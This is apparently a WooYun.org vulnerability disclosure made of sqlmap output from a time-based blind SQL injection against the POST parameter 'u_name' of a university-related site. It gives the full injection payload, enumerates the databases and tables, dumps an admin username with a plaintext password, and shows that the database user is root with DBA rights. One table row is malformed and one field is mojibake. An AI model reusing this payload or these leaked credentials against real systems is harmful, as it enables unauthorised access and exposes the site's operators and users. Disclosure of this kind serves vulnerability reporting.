WooYun.org

POST parameter 'u_name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 141 HTTP(s) requests:
---
Place: POST
Parameter: u_name
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: u_name=admin' AND SLEEP(5) AND 'WLWi'='WLWi&u_password=123456&u_role=admin&submit=锟斤拷录
---
[08:36:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11

available databases [5]:
[*] findcampus
[*] information_schema
[*] mysql
[*] performance_schema
[*] xmuhkx

Database: xmuhkx
[9 tables]
+----------+
| m_menu   |
| s_menu   |
| t_menu   |
| x_attach |
| x_news   |
| x_slider |
| x_staff  |
| x_sticky |
| x_user   |
+----------+

[09:26:11] [INFO] analyzing table dump for possible password hashes
Database: xmuhkx
Table: x_user
[2 entries]
+------+--------+----------+-------------+
| u_id | u_role | u_name   | u_password  |
+------+--------+----------+-------------+
| 1    | admin  | admin    | lzraero3075 |
| 24   | yangsize | xmuaero     |
+------+--------+----------+-------------+

[09:44:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[09:45:03] [INFO] adjusting time delay to 3 seconds due to good response times
root@%
current user is DBA:    True